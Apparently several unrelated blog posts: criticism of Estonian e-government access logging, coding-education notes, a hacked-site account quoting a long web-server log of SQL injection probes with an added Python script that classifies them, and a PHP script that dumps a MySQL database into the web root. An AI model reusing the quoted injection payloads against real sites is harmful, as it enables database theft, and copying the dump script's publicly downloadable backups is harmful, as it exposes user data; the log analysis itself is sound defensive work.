The Estonian system, he explains, is based on “trust”. While the national database can be accessed by the authorities, he stresses, the citizen has to be notified when their records are observed. So even if the system hasn’t been built on Blockchain technology, it nonetheless operates on Blockchain-like principles – creating a data system that can’t be altered without notifying both the authorities and citizens.
This is what Ilves calls a “Lockean contract” between digital citizen and the government. The 21st-century networked sovereign, he says, is the guarantor of what he calls “data integrity”. While the government can’t access our data without our knowledge, the citizen no longer has any anonymity in this system.
Problem is, there is no such transparency – no notifications, no place to log in and see who has accessed your data. There was one system with such functionality, but that was shut down like 10 years ago (added: there is one more system now: E-health, sample below). And even when it worked, it displayed only a trivial amount of accesses – like if police used the data while identifying me during a traffic stop and I had done nothing criminal (my car’s mandatory checkup had expired), that wasn’t visible. As I had also forgotten all my documents (and money) at home, I was of course totally in favour of them identifying me via databases… but anyway, there’s no trail of that positive moment that I can show to you.
The rest of the databases? I recall a meeting (in the government residence, no less) where the topic was discussed, possibly at a roundtable arranged by the National Audit Office. After some serious googling I found a contact address to which to submit a request for information about access to my data in the population registry. It took some months to get an answer, as supposedly information about who had requested my data was only available in a “comments field” and had to be assembled manually. Promoting the idea of requesting such transparency is a good start for a denial-of-service attack on Estonian e-government.
Then there was a case where somebody from the Ministry of the Interior was promoting some new legislation mandating more data storage with the argument that everybody is able to see who has been accessing the data, so it is not a privacy violation. Our correspondence ended after a couple of rounds, after she was unable to find any proof of a solution where I can view the access log.
And don’t get me started on the question of who can purchase data from our population registry or from the business register. Want to get contacts of underemployed pensioners? Give us your monies! Want to spam every e-resident who has created a company? Sure, all addresses in the registry must be business contacts, so spam away (and give us some monies)!
THI is as kickass a president as they ever get – but there is some serious ass-kicking to be done back at home, to cover his own, which has been left without notable protection on this trust issue.
Trust in Estonian e-gov databases is completely meme-based. As a citizen I should presumably be able to see who has accessed my data. As a former tech journalist, someone should have told me I’m wrong and shown me the place to see the data. But it’s like… you know, jet fuel doesn’t melt memes.
Correction – There is one system that currently displays an access log, Estonian E-Health’s Digilugu.ee “patient portal”. While it is difficult to tell if all accesses are listed, I can find most of the cases where I recall having had interactions, like my filling in of a “health self-assessment” and a doctor accessing it to provide me with the proof of health needed for a driver’s license:
Codecademy was the main topic this time – but as discussed on Saturday in some smaller circles, we should not ask “how can we use Codecademy in the classroom”, as simply learning to code – or coding – shouldn’t be considered the target. What are the cool / useful / fun things one could do with code, to create a need for learning to code? Like – Minecraft is written in Java, but if you want to create mods you can start with simpler JavaScript ScriptCraft mods … and JavaScript can be learned on Codecademy. Hmm, could we create a course for using ScriptCraft? (btw – Minecraft can be used for designing models that can be 3D-printed, see Printcraft and minecraft.print())
Or, for the less game-minded – could solving Project Euler math problems be a reason to learn programming? Could you make music or paint? Or could you evade surveillance – like in Cory Doctorow’s Little Brother (must-read, mostly culture, not code)?
Also – please bear in mind that programming might NOT be for everybody – as Jeff (who can program) explains in Why Can’t Programmers.. Program?. Let’s make sure all “we’ll teach all kids to code” projects (a) give all kids a chance to understand if the concept of coding is suitable for their mindset and (b) take a wider approach and promote the idea that not everybody developing software is a coder: we need at least as many designers, architects, technical writers, testers (you can break things and earn money!) etc.
Actual courses we looked at during the workshop:
Playground for your own projects – http://labs.codecademy.com/
Or use (and learn from) http://codepen.io/ or http://jsfiddle.net/
Or open Developer Tools in your browser – or use https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/ / http://tampermonkey.net/ plugins.
Or… look what Bret Victor thinks about the tools we actually need for teaching:
While looking at a hacked WordPress site about a year ago, I found on the same hosting possibly 5 copies of Drupal – some ancient sub-site for something, a backup copy of that, a previous version and then some more instances. A survey engine, possibly the remains of a document management system … etc. Having deobfuscated the malware’s code, its first lines turned out to start from the root and look for everything worth infecting. Impossible to fix; the only solution is to archive the code (just in case…) and delete it.
And it seems I should take some time to go systematically through all my / clients’ hostings, as this is not the only site with this problem – and I have left abandoned code around myself. That came back to me while looking for yet another breach and spotting the following lines in a logfile:
176.10.100.229 - - [06/Jun/2014:14:19:54 +0300] "GET /newsletter/index.php?id=41 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:55 +0300] "GET /newsletter/index.php?id=999999.9 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:56 +0300] "GET /newsletter/index.php?id=999999.9%20or%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:56 +0300] "GET /newsletter/index.php?id=999999.9%27%20or%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:57 +0300] "GET /newsletter/index.php?id=41%20and%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:57 +0300] "GET /newsletter/index.php?id=41%20and%201%3E1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:58 +0300] "GET /newsletter/index.php?id=41%27%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:58 +0300] "GET /newsletter/index.php?id=41%27%20and%20%27x%27%3D%27y HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:59 +0300] "GET /newsletter/index.php?id=41%22%20and%20%22x%22%3D%22x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:59 +0300] "GET /newsletter/index.php?id=41%22%20and%20%22x%22%3D%22y HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:00 +0300] "GET /newsletter/index.php?id=41%20and%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:00 +0300] "GET /newsletter/index.php?id=41%27 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:00 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:01 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:01 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:02 +0300] "GET
/newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:30 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:30 +0300] "GET 
/newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:30 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:31 +0300] "GET 
/newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:31 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:32 +0300] "GET 
/newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:32 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:33 +0300] "GET 
/newsletter/index.php?id=41%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28select%20concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%2C0x27%2C0x7e%29%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cfloor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:33 +0300] "GET /newsletter/index.php?id=41%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28select%20concat%280x7e%2C0x27%2Cdatabase%28%29%2C0x27%2C0x7e%29%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cfloor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:34 +0300] "GET /newsletter/index.php?id=convert%28int%2Cdb_name%28%29%29%20and%201%3D1 HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:34 +0300] "GET /newsletter/index.php?id=convert%28int%2Cdb_name%28%29%29-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:34 +0300] "GET /newsletter/index.php?id=41%27%20or%201%3Dconvert%28int%2Cdb_name%28%29%29-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:35 +0300] "GET /newsletter/index.php?id=41%3B%20if%20%281%3D1%29%20waitfor%20delay%20%2700%3A00%3A01%27-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:35 +0300] "GET /newsletter/index.php?id=41%27%3B%20if%20%281%3D1%29%20waitfor%20delay%20%2700%3A00%3A01%27-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:36 +0300] "GET /newsletter/index.php?id=41%20and%20if%281%3D1%2CBENCHMARK%281256666%2CMD5%280x41%29%29%2C0%29 HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:36 +0300] "GET /newsletter/index.php?id=41%27%20and%20if%281%3D1%2CBENCHMARK%281256666%2CMD5%280x41%29%29%2C0%29%20and%20%27x%27%3D%27x HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:37 +0300] "GET 
/newsletter/index.php?id=41%27%20or%201%3Dconvert%28int%2C%28select%20concat%28version%28%29%2C0x7233646D3076335F73716C5F696E6A656374696F6E%29%29%29-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:37 +0300] "GET /newsletter/index.php?id=41%27%20or%201%3Dconvert%28int%2C%28select%20cast%28Char%28114%29%2bChar%2851%29%2bChar%28100%29%2bChar%28109%29%2bChar%2848%29%2bChar%28118%29%2bChar%2851%29%2bChar%2895%29%2bChar%28104%29%2bChar%28118%29%2bChar%28106%29%2bChar%2895%29%2bChar%28105%29%2bChar%28110%29%2bChar%28106%29%2bChar%28101%29%2bChar%2899%29%2bChar%28116%29%2bChar%28105%29%2bChar%28111%29%2bChar%28110%29%20as%20nvarchar%284000%29%29%29%29-- HTTP/1.1" 200 284 176.10.100.229 - - [06/Jun/2014:14:20:38 +0300] "GET /newsletter/index.php?id=41%27%20or%201%3Dconvert%28int%2Cchr%28114%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28109%29%7C%7Cchr%2848%29%7C%7Cchr%28118%29%7C%7Cchr%2851%29%7C%7Cchr%2895%29%7C%7Cchr%28104%29%7C%7Cchr%28118%29%7C%7Cchr%28106%29%7C%7Cchr%2895%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28106%29%7C%7Cchr%28101%29%7C%7Cchr%2899%29%7C%7Cchr%28116%29%7C%7Cchr%28105%29%7C%7Cchr%28111%29%7C%7Cchr%28110%29%29-- HTTP/1.1" 200 284
An explanation of 0x31303235343830303536 can be found in the post “Site has been hacked via SQL Injection”.
In this case it seems we only had an attempted hack, as id was not the right place to brute-force your way in: there was a check for if (!intval($this->id)) and another parameter was required… but no prepared statements, just simple queries with lightly sanitized inputs.
Brrrr… must remove all unmaintained code.
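The probes in the log above fall into a handful of recognisable families: UNION-based with hex string markers, MySQL error-based via floor(rand()) and GROUP BY, MS SQL error-based via convert(int, …), and time-based via waitfor delay or BENCHMARK(). The following is an added Python example, not code from the post or from tehnokratt.net, that parses each access-log request line, decodes the query parameters, tags the family and the DBMS the syntax points at, recovers the ASCII behind the 0x… literals, and records the value an intval()-style check of the kind mentioned above would have seen (PHP's intval() takes the leading digits of a string, so a value starting with 41 still counts as 41 and passes a "non-zero" test). The log lines are constructed to mirror the page's probes with shortened payloads; the IP address is a documentation address rather than the one in the post, and the log format is assumed to be Apache's common log format.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: Apache-style access log entries modelled on the probes quoted
# in the post (payloads shortened, documentation IP 203.0.113.7, made-up timestamps).
SAMPLE_LOG = """\
203.0.113.7 - - [06/Jun/2014:14:20:25 +0300] "GET /newsletter/index.php?id=41 HTTP/1.1" 200 284
203.0.113.7 - - [06/Jun/2014:14:20:26 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
203.0.113.7 - - [06/Jun/2014:14:20:33 +0300] "GET /newsletter/index.php?id=41%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28database%28%29%2Cfloor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.1" 200 284
203.0.113.7 - - [06/Jun/2014:14:20:34 +0300] "GET /newsletter/index.php?id=convert%28int%2Cdb_name%28%29%29-- HTTP/1.1" 200 284
203.0.113.7 - - [06/Jun/2014:14:20:35 +0300] "GET /newsletter/index.php?id=41%3B%20if%20%281%3D1%29%20waitfor%20delay%20%2700%3A00%3A01%27-- HTTP/1.1" 200 284
203.0.113.7 - - [06/Jun/2014:14:20:36 +0300] "GET /newsletter/index.php?id=41%20and%20if%281%3D1%2CBENCHMARK%281256666%2CMD5%280x41%29%29%2C0%29 HTTP/1.1" 200 284
"""

# host ident user [time] "method target protocol" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Each rule: tag, DBMS whose syntax it is, pattern applied to the lower-cased decoded value.
RULES = [
    ("union-select",      "mysql", re.compile(r"\bunion\b[\s\S]*\bselect\b")),
    ("error-floor-rand",  "mysql", re.compile(r"floor\(rand\([\s\S]*group by")),
    ("error-convert-int", "mssql", re.compile(r"convert\(int")),
    ("time-waitfor",      "mssql", re.compile(r"waitfor\s+delay")),
    ("time-benchmark",    "mysql", re.compile(r"\bbenchmark\(|\bsleep\(")),
]
HEX_LITERAL = re.compile(r"0x([0-9a-f]{6,})")
LEADING_INT = re.compile(r"^\s*[+-]?\d+")


def php_intval(value):
    """Mimic PHP's intval() on a string: the leading integer digits, else 0."""
    m = LEADING_INT.match(value)
    return int(m.group(0)) if m else 0


def decode_hex_literals(value):
    """ASCII behind 0x... literals, the marker strings scanners plant in UNION probes."""
    out = []
    for h in HEX_LITERAL.findall(value):
        if len(h) % 2 == 0:
            text = bytes.fromhex(h).decode("ascii", errors="replace")
            if text not in out:
                out.append(text)
    return out


def classify(value):
    """Return (tags, dbms_hints) for one decoded parameter value; empty lists if benign."""
    low = value.lower()
    tags, dbms = [], []
    for tag, engine, pat in RULES:
        if pat.search(low):
            tags.append(tag)
            if engine not in dbms:
                dbms.append(engine)
    return tags, dbms


def scan(log_text):
    """One finding per parameter value that matches at least one rule, in log order."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, _method, target, status, _size = m.groups()
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for name, values in params.items():
            for v in values:
                tags, dbms = classify(v)
                if not tags:
                    continue
                findings.append({
                    "ip": ip, "time": ts, "status": int(status), "param": name,
                    "tags": tags, "dbms": dbms,
                    "hex_literals": decode_hex_literals(v.lower()),
                    # what an `if (!intval($id))` style check sees; non-zero means it passes
                    "intval": php_intval(v),
                })
    return findings


def probes_per_ip(findings):
    """Count flagged requests per source address, the natural unit for an alert."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["param"], f["tags"], f["dbms"], f["hex_literals"], "intval=", f["intval"])
    print(probes_per_ip(scan(SAMPLE_LOG)))
```

Two things worth reading off the output: the union, floor(rand()) and time-based probes all start with a valid integer, so a leading-digit presence check does not reject them, which is why the only real control is a prepared statement with the cast integer bound as the parameter; and a burst of several tagged requests from one address within seconds, as probes_per_ip() shows, is the signal to alert on rather than any single pattern.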
And with RazorSQL?
The resulting SQL was quite importable using phpMyAdmin, with the exception of some blob fields that had been marked “not null” for no good reason in MS SQL… And you need to import the data first and only then enforce the constraints.
So now, whenever I need to dump a MySQL database produced by an unfriendly application, I do it from the command line and twice: as utf8 and as latin1, deciding later which dump works better. And as it happens, FTP access is much easier to get than SSH… and you can find a config with SQL access pretty easily… I don’t even bother with anything else: I just upload humpty-dump.php, configure some access variables and hit it from the web side (well, I do take care to rename it before uploading and to delete it afterwards, just in case you wonder about the security implications :-).
AND, as I sometimes also need to grab database dumps from WordPress installs with only FTP access (and am unwilling to bother with installing a database-management plugin)… here comes humpty-dump.php:
<?php
// dump database - either using WordPress config from same directory or locally configured parameters
// v 1.2 (2012-11-25) Peeter Marvet, http://tehnokratt.net
if ( is_file( dirname( __FILE__ ) . '/wp-config.php' ) ) {
    include( dirname( __FILE__ ) . '/wp-config.php' );
} else {
    define('DB_NAME', 'name');
    define('DB_USER', 'user');
    define('DB_PASSWORD', 'pass');
    define('DB_HOST', 'localhost');
    define('DB_CHARSET', 'utf8'); // NB! use latin1 on legacy systems that tend to produce unreadable dumps from phpmyadmin!
}

// dump file name: <db>_<timestamp>[_<charset>].gz, written next to this script (i.e. into the web root)
$backupFile = DB_NAME . "_" . date("Y-m-d-H-i-s");
$command = "mysqldump --opt ";
if ( defined('DB_CHARSET') ) {
    $command .= "--default-character-set=" . escapeshellarg(DB_CHARSET) . " ";
    $backupFile .= "_" . DB_CHARSET;
}
$backupFile .= '.gz';

// escapeshellarg() keeps a password, host or name containing shell metacharacters
// from breaking (or extending) the command line
$command .= "--host=" . escapeshellarg(DB_HOST)
          . " --user=" . escapeshellarg(DB_USER)
          . " --password=" . escapeshellarg(DB_PASSWORD)
          . " " . escapeshellarg(DB_NAME)
          . " | gzip > " . escapeshellarg($backupFile);

echo "Dumping <strong>" . DB_NAME . "</strong> on <strong>" . DB_HOST . "</strong>... ";
// system() already prints the command's output; echoing its return value would repeat the last line
system($command);
echo 'Done! Grab it before it rots: <a href="http://' . $_SERVER['SERVER_NAME'] . '/' . $backupFile . '">' . $backupFile . '</a>';
// the dump is now downloadable by anyone who guesses the name: delete it (and this script) once fetched
?>